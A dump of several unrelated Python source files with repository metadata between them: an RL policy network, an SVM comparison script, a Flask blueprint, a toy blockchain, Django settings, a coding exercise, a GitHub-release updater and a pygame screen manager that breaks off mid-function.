self.main.classifier = nn.Sequential(*list(self.main.classifier.children())[:-3])
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = self.main(inputs / 255.0)
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class MobilenetBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=1280):
super(MobilenetBase, self).__init__(recurrent, hidden_size, hidden_size)
self.main = mobilenet_v2(pretrained=True, progress=True)
self.main.classifier = nn.Identity()
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = self.main(inputs / 255.0)
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class EfficientnetBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=5120):
super(EfficientnetBase, self).__init__(recurrent, hidden_size, hidden_size)
self.main = EfficientNet.from_pretrained("efficientnet-b0", advprop=False)
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = self.main.extract_features(inputs / 255.0).view(-1, 1280 * 4)
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class MLPBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=64, n_layers=2):
super(MLPBase, self).__init__(recurrent, num_inputs, hidden_size, n_layers)
if recurrent:
num_inputs = hidden_size
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), np.sqrt(2))
# self.actor = nn.Sequential(init_(
# nn.Linear(num_inputs, hidden_size)),
# nn.Tanh(),
# init_(nn.Linear(hidden_size, hidden_size)),
# nn.Tanh()
# )
self.actor = [init_(nn.Linear(num_inputs, hidden_size)), nn.Tanh()]
for _ in range(n_layers - 1):
self.actor += [init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh()]
self.actor = nn.Sequential(*self.actor)
# self.critic = nn.Sequential(init_(
# nn.Linear(num_inputs, hidden_size)),
# nn.Tanh(),
# init_(nn.Linear(hidden_size, hidden_size)),
# nn.Tanh()
# )
self.critic = [init_(nn.Linear(num_inputs, hidden_size)), nn.Tanh()]
for _ in range(n_layers - 1):
self.critic += [init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh()]
self.critic = nn.Sequential(*self.critic)
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = inputs
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
hidden_critic = self.critic(x)
hidden_actor = self.actor(x)
return self.critic_linear(hidden_critic), hidden_actor, rnn_hxs
class NaviBase(NNBase):
def __init__(self, num_inputs, recurrent=False, num_streets=4, hidden_size=256, total_hidden_size=(256 * 10)):
if recurrent:
raise NotImplementedError("recurrent policy not done yet")
super(NaviBase, self).__init__(recurrent, hidden_size, hidden_size)
self.num_streets = num_streets
init_cnn = lambda m: init(
m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), nn.init.calculate_gain("relu")
)
init_dense = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), np.sqrt(2))
self.img_embed = nn.Sequential(
init_cnn(nn.Conv2d(3, 32, 3, stride=2)),
nn.ReLU(),
init_cnn(nn.Conv2d(32, 64, 5, stride=2)),
nn.ReLU(),
init_cnn(nn.Conv2d(64, 32, 5, stride=2)),
nn.ReLU(),
Flatten(),
init_cnn(nn.Linear(32 * 8 * 8, hidden_size)),
nn.ReLU(),
)
# NeED to look if different activation functions
self.coord_embed = nn.Sequential(
init_dense(nn.Linear(2, 64)), nn.Tanh(), init_dense(nn.Linear(64, hidden_size)), nn.Tanh()
)
self.number_embed = nn.Sequential(init_dense(nn.Linear(10, 64)), nn.Tanh())
self.street_embed = nn.Sequential(init_dense(nn.Linear(self.num_streets, hidden_size)), nn.Tanh())
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(total_hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
image = inputs[:, :3, :, :]
rel_gps = inputs[:, 3, 0, :2]
abs_gps = inputs[:, 3, 0, 2:4]
vis_street_names = inputs[:, 3, 1, : 2 * self.num_streets]
vis_house_numbers = torch.cat([inputs[:, 3, 2, :84], inputs[:, 3, 3, :36]], dim=1)
goal_house_numbers = inputs[:, 3, 4, :40]
goal_street_name = inputs[:, 3, 4, 40 : 40 + self.num_streets]
img_e = self.img_embed(image)
rel_gps_e = self.coord_embed(rel_gps)
abs_gps_e = self.coord_embed(abs_gps)
goal_hn_e = torch.tensor([])
vis_hn_e = torch.tensor([])
vis_sn_e = torch.tensor([])
if torch.cuda.is_available():
goal_hn_e = goal_hn_e.cuda()
vis_hn_e = vis_hn_e.cuda()
vis_sn_e = vis_sn_e.cuda()
for i in range(4):
goal_hn_embed = self.number_embed(goal_house_numbers[:, i * 10 : (i + 1) * 10])
goal_hn_e = torch.cat((goal_hn_e, goal_hn_embed), dim=1)
goal_sn_e = self.street_embed(goal_street_name)
for j in range(3):
offset = j * 40
for i in range(4):
vis_hn_embed = self.number_embed(vis_house_numbers[:, offset + (i * 10) : offset + ((i + 1) * 10)])
vis_hn_e = torch.cat((vis_hn_e, vis_hn_embed), dim=1)
for i in range(2):
vis_sn_embed = self.street_embed(vis_street_names[:, i * self.num_streets : (i + 1) * self.num_streets])
vis_sn_e = torch.cat((vis_sn_e, vis_sn_embed), dim=1)
x = torch.cat((img_e, rel_gps_e, abs_gps_e, goal_hn_e, goal_sn_e, vis_hn_e, vis_sn_e), dim=1)
return self.critic_linear(x), x, rnn_hxs
| 34.427252
| 116
| 0.59576
|
22553da8402761e1da2d467b554fcb89de63b5fb
| 2,049
|
py
|
Python
|
code/sklearn_comparison.py
|
pcwright1/my_linear_svm
|
c3e97fd4ad62b11a0e3fa97e311e214f4d55f649
|
[
"MIT"
] | 1
|
2019-04-23T13:48:17.000Z
|
2019-04-23T13:48:17.000Z
|
code/sklearn_comparison.py
|
pcwright1/my_linear_svm
|
c3e97fd4ad62b11a0e3fa97e311e214f4d55f649
|
[
"MIT"
] | null | null | null |
code/sklearn_comparison.py
|
pcwright1/my_linear_svm
|
c3e97fd4ad62b11a0e3fa97e311e214f4d55f649
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn import preprocessing
#import matplotlib.pyplot as plt
import os
import time
from multiprocessing.dummy import Pool as ThreadPool
import svm
from sklearn.model_selection import train_test_split
from sklearn import svm as sklearnsvm
import matplotlib.pyplot as plt
from sklearn import datasets
if __name__ == '__main__':
#import data
digits = datasets.load_digits()
# To apply a classifier on this data, we need to flatten the images, to
# turn the data in a (samples, feature) matrix:
n_samples = len(digits.images)
data = digits.images.reshape((n_samples, -1))
# Create training and test sets
X_train = data[:int(n_samples / 2)]
val_features = data[int(n_samples / 2):]
y_train = digits.target[:int(n_samples / 2)]
val_labels = digits.target[int(n_samples / 2):]
# Standardize the data
scaler = preprocessing.StandardScaler()
X_train = scaler.fit_transform(X_train)
val_features = scaler.fit_transform(val_features)
# Run classifier
classifier_betas, i_vals, j_vals, objs = svm.one_v_one_classifiers(x=X_train,
y=y_train,
lambd=-1,
max_iters=100)
# Misclassification error
linSVM_misclassification = np.mean(svm.predict_label(val_features,
classifier_betas,
i_vals,j_vals)
!= val_labels)
print("Misclassification rate:",np.mean(linSVM_misclassification))
clf = sklearnsvm.SVC()
clf.fit(X_train, y_train)
#print(clf.predict(val_features))
#print(val_labels)
print("misclassification skl:",np.mean(clf.predict(val_features)
!= val_labels))
| 37.254545
| 81
| 0.599805
|
c0e5fd4cafd3bd82d5cfbea860fbfac72ff86ee5
| 177
|
py
|
Python
|
newspaperdemo/controllers/article.py
|
easy-quest/demo-news
|
33807b1c0e7663ca902530d52ab863a815c79649
|
[
"MIT"
] | 29
|
2015-08-08T13:51:03.000Z
|
2021-12-26T14:42:28.000Z
|
newspaperdemo/controllers/article.py
|
easy-quest/demo-news
|
33807b1c0e7663ca902530d52ab863a815c79649
|
[
"MIT"
] | 1
|
2017-08-04T01:12:54.000Z
|
2017-08-04T01:13:52.000Z
|
newspaperdemo/controllers/article.py
|
easy-quest/demo-news
|
33807b1c0e7663ca902530d52ab863a815c79649
|
[
"MIT"
] | 20
|
2016-01-17T19:14:56.000Z
|
2021-12-01T22:01:47.000Z
|
from flask import Blueprint, render_template, request
mod = Blueprint('article', __name__)
@mod.route('/article')
def index():
return render_template('article/index.html')
| 25.285714
| 53
| 0.751412
|
e1b76edef2ebb94338bfb094954331e2da7cb207
| 2,655
|
py
|
Python
|
src/blockchain.py
|
kiran94/blockchain-tutorial
|
b561e1d9bf08ca5b5fa41a54720806376e68b4bf
|
[
"MIT"
] | null | null | null |
src/blockchain.py
|
kiran94/blockchain-tutorial
|
b561e1d9bf08ca5b5fa41a54720806376e68b4bf
|
[
"MIT"
] | null | null | null |
src/blockchain.py
|
kiran94/blockchain-tutorial
|
b561e1d9bf08ca5b5fa41a54720806376e68b4bf
|
[
"MIT"
] | null | null | null |
'''
This module provides a Simple Blockchain implementation for learning.
Block Structure: https://gist.github.com/dvf/79633bf97e2a831f066f699d41c2b9d5#file-blockchain-py
'''
from time import time
from hash import Hash
class Blockchain:
'''
Blockchain implementation
Responsible for managing the chain
and will store transactions and have some helper
functions for interacting with the chain.
'''
def __init__(self):
'''
Creates an Empty Blockchain instance.
'''
# Create an empty chain and no transactions on start.
self.chain = []
self.current_transactions = []
# Create the Genesis Block.
self.new_block(proof=100, previous_hash=1)
def new_block(self, proof, previous_hash=None):
'''
Creates a new Block in the Blockchain.
:param proof: <int> The Proof given by the proof of work algorithm
:param previous_hash: (Optional) <str> Hash of the previous block
:return <dict> New Block.
'''
# Create the new block with the current transactions
# and linked to the previous hash or latest in the chain.
block = {
'index' : len(self.chain) + 1,
'timestamp' : time(),
'transactions' : self.current_transactions,
'proof' : proof,
# New block stores the has of the previous block.
'previous_hash' : previous_hash or Hash.hash(self.chain[-1])
}
# Reset the current list of transactions
# as they have been mined into the above block.
self.current_transactions = []
# Add the block to the chain.
self.chain.append(block)
return block
def new_transaction(self, sender, recipient, amount):
'''
Creates a new transaction to go to the next mined block.
:param sender: <str> Address of the sender
:param recipient: <str> Address of the recipient
:param amount: <int> Amount to send
:return: <int> The index of the block that will hold this transaction.
'''
# Add the new transaction to the current transactions,
# to be mined in the next block.
self.current_transactions.append(
{
'sender' : sender,
'recipient' : recipient,
'amount' : amount
})
return self.last_block["index"] + 1
@property
def last_block(self):
'''
Returns the last block in the chain.
'''
return self.chain[-1]
| 29.831461
| 100
| 0.588324
|
d1bc5f4bfaf3e634bf2637d7dc50e160d19b033b
| 3,803
|
py
|
Python
|
poll_project/settings.py
|
waregagbagbo/Social_App
|
a6cc83b09de613fb1b51f8a5596366cc8c5c6806
|
[
"MIT"
] | null | null | null |
poll_project/settings.py
|
waregagbagbo/Social_App
|
a6cc83b09de613fb1b51f8a5596366cc8c5c6806
|
[
"MIT"
] | null | null | null |
poll_project/settings.py
|
waregagbagbo/Social_App
|
a6cc83b09de613fb1b51f8a5596366cc8c5c6806
|
[
"MIT"
] | null | null | null |
"""
Django settings for poll_project project.
Generated by 'django-admin startproject' using Django 4.0.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-qfby32a^ik_@=7dx2@6()&y=hs3(u0=kh2bi@_vm0)2=%-v+e='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'polls',
'socials',
'bulma',
#"social_django",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'poll_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS':[os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'poll_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATIC_URL = 'static/'
STATIC_ROOT = os.path.join(BASE_DIR,'/static/')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR,'/media/')
STATICFILES_DIR = BASE_DIR/'static'
# Default primary key field type
# https://docs.djangoproject.com/en/4.0/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
LOGOUT_REDIRECT_URL = '/'
from django.contrib.messages import constants as messages
MESSAGE_TAGS ={
messages.DEBUG: 'debug',
messages.INFO: 'info',
messages.SUCCESS: 'success',
messages.WARNING: 'warning',
messages.ERROR: 'error'
}
| 25.52349
| 91
| 0.692348
|
aedcf66269f2d205a5f0b45b573103b9527fbae4
| 2,933
|
py
|
Python
|
python/misc/whos_the_oldest.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
python/misc/whos_the_oldest.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | 2
|
2022-03-10T03:49:14.000Z
|
2022-03-14T00:49:54.000Z
|
python/misc/whos_the_oldest.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Find the oldest. Who's The Oldest?
Given a dictionary containing the names and ages of a group of people,
return the name of the oldest person.
Source:
https://edabit.com/challenge/3A6x5GjWmT4t8pssL"""
def oldest(people: dict) -> str:
"""Find the oldest person in people dict."""
oldest_age = max(people.values())
oldest_person = [person for person,
age in people.items()
if age == oldest_age][0]
return oldest_person
def main():
"""Run sample oldest functions. Do not import."""
assert oldest({'Charlotte': 53, 'Oliver': 15, 'Henry': 18,
'Gabriel': 46, 'Violet': 13}) == "Charlotte"
assert oldest({'Grayson': 50, 'Imogen': 63, 'Logan': 21,
'Daniel': 64, 'Rory': 19}) == "Daniel"
assert oldest({'Josh': 78, 'Adam': 63, 'Aria': 65,
'Grace': 51, 'Bella': 37}) == "Josh"
assert oldest({'Alex': 9, 'Jayden': 18, 'Julia': 43,
'Penelope': 32, 'Ella': 34}) == "Julia"
assert oldest({'Sam': 65, 'Joseph': 60, 'Mia': 41,
'Thomas': 31, 'Rebecca': 5}) == "Sam"
assert oldest({'Eden': 64, 'Archie': 18, 'Olivia': 32,
'Kai': 84, 'Harry': 14}) == "Kai"
assert oldest({'Anna': 67, 'Elijah': 10, 'Cole': 31,
'Andrew': 24, 'Elliot': 77}) == "Elliot"
assert oldest({'Innes': 77, 'Lilly': 11, 'Hallie': 41,
'Nina': 66, 'Ryan': 9}) == "Innes"
assert oldest({'Isla': 73, 'Elsie': 6, 'Frankie': 36,
'Robbie': 75, 'Kayla': 9}) == "Robbie"
assert oldest({'Jack': 64, 'Jacob': 33, 'Tommy': 17,
'Finn': 5, 'Isaac': 13}) == "Jack"
assert oldest({'Carson': 81, 'Charlie': 33, 'Riley': 28,
'Maria': 39, 'Sadie': 67}) == "Carson"
assert oldest({'Amy': 70, 'Owen': 11, 'Matilda': 64,
'Lexi': 37, 'Lena': 26}) == "Amy"
assert oldest({'Lola': 45, 'Tyler': 23, 'Hope': 4,
'Phoebe': 86, 'Freya': 44}) == "Phoebe"
assert oldest({'Hollie': 48, 'Harris': 24, 'Ava': 72,
'Alfie': 9, 'Louis': 47}) == "Ava"
assert oldest({'Erica': 32, 'Eve': 82, 'Harper': 74,
'Summer': 38, 'Ben': 72}) == "Eve"
assert oldest({'Michael': 63, 'Jessica': 65, 'Reuben': 25,
'Aiden': 82, 'Emily': 18}) == "Aiden"
assert oldest({'Brooke': 8, 'Lucy': 44, 'Cooper': 33,
'Ellie': 82, 'Millie': 7}) == "Ellie"
assert oldest({'Piper': 10, 'Quinn': 62, 'David': 20,
'John': 61, 'Noah': 17}) == "Quinn"
assert oldest({'Cara': 5, 'Max': 81, 'Lucas': 62,
'Sophie': 71, 'Amelia': 79}) == "Max"
assert oldest({'Leo': 29, 'Clara': 8, 'Florence': 69,
'Lewis': 38, 'James': 47}) == "Florence"
print('Passed.')
if __name__ == "__main__":
main()
| 43.132353
| 70
| 0.492329
|
e05a8f197347fe4ce02b71f8a88eb3115ceb99a5
| 1,932
|
py
|
Python
|
dotmatrix/visualization/layout.py
|
alvinlao/dot-matrix-map
|
32925d5ede38c634ab53b966d779786366a1855c
|
[
"MIT"
] | null | null | null |
dotmatrix/visualization/layout.py
|
alvinlao/dot-matrix-map
|
32925d5ede38c634ab53b966d779786366a1855c
|
[
"MIT"
] | null | null | null |
dotmatrix/visualization/layout.py
|
alvinlao/dot-matrix-map
|
32925d5ede38c634ab53b966d779786366a1855c
|
[
"MIT"
] | null | null | null |
from enum import Enum
class Dimension(Enum):
WIDTH = 1
HEIGHT = 2
config_key = {
Dimension.WIDTH: {
'size': lambda c: c['width'],
'padding-ratio': lambda c: c['padding-horizontal'],
'num_dots': lambda c: len(c['dots'][0]),
},
Dimension.HEIGHT: {
'size': lambda c: c['height'],
'padding-ratio': lambda c: c['padding-vertical'],
'num_dots': lambda c: len(c['dots']),
},
}
def get(config, dimension, attribute):
return config_key[dimension][attribute](config)
def padding(config, dimension):
if fixed_dimension(config) == dimension:
return fixed_padding(config, dimension)
else:
return free_padding(config, dimension)
def fixed_padding(config, dimension):
size = get(config, dimension, 'size')
padding_ratio = get(config, dimension, 'padding-ratio')
return size * padding_ratio
def free_padding(config, dimension):
size = get(config, dimension, 'size')
return (size - used_space(config, dimension)) / 2
def used_space(config, dimension):
num_dots = get(config, dimension, 'num_dots')
return num_dots * dot_slot_size(config)
def allocated_space(config, dimension):
size = get(config, dimension, 'size')
return size - (2 * fixed_padding(config, dimension))
def dot_slot_size(config):
return min(
fixed_dot_slot_size(config, Dimension.WIDTH),
fixed_dot_slot_size(config, Dimension.HEIGHT))
def fixed_dot_slot_size(config, dimension):
space = allocated_space(config, dimension)
num_dots = get(config, dimension, 'num_dots')
return space / num_dots
def fixed_dimension(config):
return min(
Dimension.WIDTH,
Dimension.HEIGHT,
key=lambda d: fixed_dot_slot_size(config, d))
def free_dimension(config):
return max(
Dimension.WIDTH,
Dimension.HEIGHT,
key=lambda d: fixed_dot_slot_size(config, d))
| 24.455696
| 59
| 0.661491
|
7c991e5dc9febaf878ecae6dda5890e5e085f918
| 1,844
|
py
|
Python
|
python/updater.py
|
nattyan-tv/ark-server-utility
|
32eb9b4b5100630b13ce017d46b7ba635b61a915
|
[
"MIT"
] | null | null | null |
python/updater.py
|
nattyan-tv/ark-server-utility
|
32eb9b4b5100630b13ce017d46b7ba635b61a915
|
[
"MIT"
] | 2
|
2021-12-20T01:39:05.000Z
|
2022-01-19T15:06:52.000Z
|
python/updater.py
|
nattyan-tv/ark-server-utility
|
32eb9b4b5100630b13ce017d46b7ba635b61a915
|
[
"MIT"
] | null | null | null |
import sys
import requests
import zipfile
import shutil
import os
from tkinter import messagebox
url='https://github.com/nattyan-tv/ark-server-utility/releases/latest/download/ark-server-utility.zip'
filename='ark-server-utility.zip'
path = "./update"
def main():
print(sys.argv)
if len(sys.argv) >= 2 and sys.argv[1] == "true":
try:
urlData = requests.get(url).content
with open(filename ,mode='wb') as f:
f.write(urlData)
if not os.path.exists(path):
with zipfile.ZipFile(filename) as zip:
zip.extractall(path)
else:
shutil.rmtree(path)
with zipfile.ZipFile(filename) as zip:
zip.extractall(path)
for i in range(len(os.listdir(path))):
print([os.listdir(path)[i],os.path.isfile(f"{path}/{os.listdir(path)[i]}")])
if os.path.isfile(f"{path}/{os.listdir(path)[i]}"):
shutil.copy2(f"{path}/{os.listdir(path)[i]}", "./")
elif os.path.isdir(f"{path}/{os.listdir(path)[i]}"):
shutil.rmtree(f"./{os.listdir(path)[i]}")
shutil.copytree(f"{path}/{os.listdir(path)[i]}", f"./{os.listdir(path)[i]}")
os.remove(f"./{filename}")
messagebox.showinfo("アップデート成功", "アップデートに成功しました。")
return
except BaseException as err:
messagebox.showerror("アップデート失敗", f"アップデート操作中にエラーが発生しました。\n{err}")
rt = messagebox.askretrycancel("アップデート失敗", "再試行しますか?")
if rt == True:
main()
return
else:
return
else:
messagebox.showerror("アップデーター", "アップデートはARK: Server Utilityから行えます。")
return
if __name__ == "__main__":
main()
| 35.461538
| 102
| 0.541757
|
2f79c4b3137a75c5f6533dd6dbc228a470031e1d
| 9,680
|
py
|
Python
|
tools/screen_manager.py
|
PDillis/coiltraine
|
a682aa62af5f6ecb95a837d33b70d893d3d261f6
|
[
"MIT"
] | 1
|
2021-03-01T19:43:12.000Z
|
2021-03-01T19:43:12.000Z
|
tools/screen_manager.py
|
PDillis/coiltraine
|
a682aa62af5f6ecb95a837d33b70d893d3d261f6
|
[
"MIT"
] | null | null | null |
tools/screen_manager.py
|
PDillis/coiltraine
|
a682aa62af5f6ecb95a837d33b70d893d3d261f6
|
[
"MIT"
] | null | null | null |
import colorsys
import pygame
import numpy as np
from random import randint
from skimage import transform as trans
import scipy
import cv2
clock = pygame.time.Clock()
rsrc = \
[[43.45456230828867, 118.00743250075844],
[104.5055617352614, 69.46865203761757],
[114.86050156739812, 60.83953551083698],
[129.74572757609468, 50.48459567870026],
[132.98164627363735, 46.38576532847949],
[301.0336906326895, 98.16046448916306],
[238.25686790036065, 62.56535881619311],
[227.2547443287154, 56.30924933427718],
[209.13359962247614, 46.817221154818526],
[203.9561297064078, 43.5813024572758]]
rdst = \
[[10.822125594094452, 1.42189132706374],
[21.177065426231174, 1.5297552836484982],
[25.275895776451954, 1.42189132706374],
[36.062291434927694, 1.6376192402332563],
[40.376849698318004, 1.42189132706374],
[11.900765159942026, -2.1376192402332563],
[22.25570499207874, -2.1376192402332563],
[26.785991168638553, -2.029755283648498],
[37.033067044190524, -2.029755283648498],
[41.67121717733509, -2.029755283648498]]
tform3_img = trans.ProjectiveTransform()
tform3_img.estimate(np.array(rdst), np.array(rsrc))
def draw_vbar_on(img,bar_intensity,x_pos,color=(0,0,255)):
bar_size = int(img.shape[1]/6 * bar_intensity)
initial_y_pos = img.shape[0] - img.shape[0]/6
#print bar_intensity
for i in range(bar_size):
if bar_intensity > 0.0:
y = initial_y_pos - i
for j in range(20):
img[y , x_pos +j] = color
def generate_ncolors(num_colors):
color_pallet = []
for i in range(0, 360, 360 / num_colors):
hue = i
saturation = 90 + float(randint(0, 1000)) / 1000 * 10
lightness = 50 + float(randint(0, 1000)) / 1000 * 10
color = colorsys.hsv_to_rgb(float(hue) / 360.0, saturation / 100, lightness / 100)
color_pallet.append(color)
# addColor(c);
return color_pallet
def get_average_over_interval(vector, interval):
avg_vector = []
for i in range(0, len(vector), interval):
initial_train = i
final_train = i + interval
avg_point = sum(vector[initial_train:final_train]) / interval
avg_vector.append(avg_point)
return avg_vector
def get_average_over_interval_stride(vector, interval, stride):
avg_vector = []
for i in range(0, len(vector) - interval, stride):
initial_train = i
final_train = i + interval
avg_point = sum(vector[initial_train:final_train]) / interval
avg_vector.append(avg_point)
return avg_vector
def perspective_tform(x, y):
p1, p2 = tform3_img((x, y))[0]
return p2, p1
# ***** functions to draw lines *****
def draw_pt(img, x, y, color, sz=1):
row, col = perspective_tform(x, y)
if 0 <= row < img.shape[0] and 0 <= col < img.shape[1]:
img[int(row - sz):int(row + sz), int(col - sz - 65):int(col + sz - 65)] = color
def draw_path(img, path_x, path_y, color):
for x, y in zip(path_x, path_y):
draw_pt(img, x, y, color)
# ***** functions to draw predicted path *****
def calc_curvature(v_ego, angle_steers, angle_offset=0):
deg_to_rad = np.pi / 180.
slip_fator = 0.0014 # slip factor obtained from real data
steer_ratio = 15.3
wheel_base = 2.67
angle_steers_rad = (angle_steers - angle_offset) * deg_to_rad
curvature = angle_steers_rad / (steer_ratio * wheel_base * (1. + slip_fator * v_ego ** 2))
return curvature
def calc_lookahead_offset(v_ego, angle_steers, d_lookahead, angle_offset=0):
# *** this function return teh lateral offset given the steering angle, speed and the lookahead distance
curvature = calc_curvature(v_ego, angle_steers, angle_offset)
# clip is to avoid arcsin NaNs due to too sharp turns
y_actual = d_lookahead * np.tan(np.arcsin(np.clip(d_lookahead * curvature, -0.999, 0.999)) / 2.)
return y_actual, curvature
def draw_path_on(img, speed_ms, angle_steers, color=(0, 0, 255)):
path_x = np.arange(0., 50.1, 0.5)
path_y, _ = calc_lookahead_offset(speed_ms, angle_steers, path_x)
draw_path(img, path_x, path_y, color)
class ScreenManager(object):
def __init__(self, load_steer=False):
pygame.init()
# Put some general parameterss
self._render_iter = 2000
self._speed_limit = 50.0
if load_steer:
self._wheel = cv2.imread('./drive_interfaces/wheel.png') # ,cv2.IMREAD_UNCHANGED)
self._wheel = cv2.resize(self._wheel, (int(0.08 * self._wheel.shape[0]), int(0.08 * self._wheel.shape[1])))
# If we were to load the steering wheel load it
# take into consideration the resolution when ploting
# TODO: Resize properly to fit the screen ( MAYBE THIS COULD BE DONE DIRECTLY RESIZING screen and keeping SURFACES)
def start_screen(self, resolution, aspect_ratio, scale=1):
self._resolution = resolution
self._aspect_ratio = aspect_ratio
self._scale = scale
size = (resolution[0] * aspect_ratio[0], resolution[1] * aspect_ratio[1])
self._screen = pygame.display.set_mode((size[0] * scale, size[1] * scale), pygame.DOUBLEBUF)
# self._screen.set_alpha(None)
pygame.display.set_caption("Human/Machine - Driving Software")
self._camera_surfaces = []
for i in range(aspect_ratio[0] * aspect_ratio[1]):
camera_surface = pygame.surface.Surface(resolution, 0, 24).convert()
self._camera_surfaces.append(camera_surface)
def paint_on_screen(self, size, content, color, position, screen_position):
myfont = pygame.font.SysFont("monospace", size * self._scale, bold=True)
position = (position[0] * self._scale, position[1] * self._scale)
final_position = (position[0] + self._resolution[0] * (self._scale * (screen_position[0])), \
position[1] + (self._resolution[1] * (self._scale * (screen_position[1]))))
content_to_write = myfont.render(content, 1, color)
self._screen.blit(content_to_write, final_position)
def set_array(self, array, screen_position, position=(0, 0), scale=None):
if scale is None:
scale = self._scale
if array.shape[0] != self._resolution[1] or array.shape[1] != self._resolution[0]:
array = scipy.misc.imresize(array, [self._resolution[1], self._resolution[0]])
# print array.shape, self._resolution
final_position = (position[0] + self._resolution[0] * (scale * (screen_position[0])), \
position[1] + (self._resolution[1] * (scale * (screen_position[1]))))
# pygame.surfarray.array_colorkey(self._camera_surfaces[screen_number])
self._camera_surfaces[screen_position[0] * screen_position[1]].set_colorkey((255, 0, 255))
pygame.surfarray.blit_array(self._camera_surfaces[screen_position[0] * screen_position[1]],
array.swapaxes(0, 1))
camera_scale = pygame.transform.scale(self._camera_surfaces[screen_position[0] * screen_position[1]],
(int(self._resolution[0] * scale), int(self._resolution[1] * scale)))
self._screen.blit(camera_scale, final_position)
def draw_wheel_on(self, steer, screen_position):
cols, rows, c = self._wheel.shape
M = cv2.getRotationMatrix2D((cols / 2, rows / 2), -90 * steer, 1)
rot_wheel = cv2.warpAffine(self._wheel, M, (cols, rows), borderMode=cv2.BORDER_CONSTANT, borderValue=(0, 0, 0))
# scale = 0.5
position = (self._resolution[0] / 2 - cols / 2, int(self._resolution[1] / 1.5) - rows / 2)
# print position
wheel_surface = pygame.surface.Surface((rot_wheel.shape[1], rot_wheel.shape[0]), 0, 24).convert()
# print array.shape, self._resolution
# final_position = (position[0] + self._resolution[0]*(scale*(screen_number%3)),\
# position[1] + (self._resolution[1]*(scale*(screen_number/3))))
# pygame.surfarray.array_colorkey(self._camera_surfaces[screen_number])
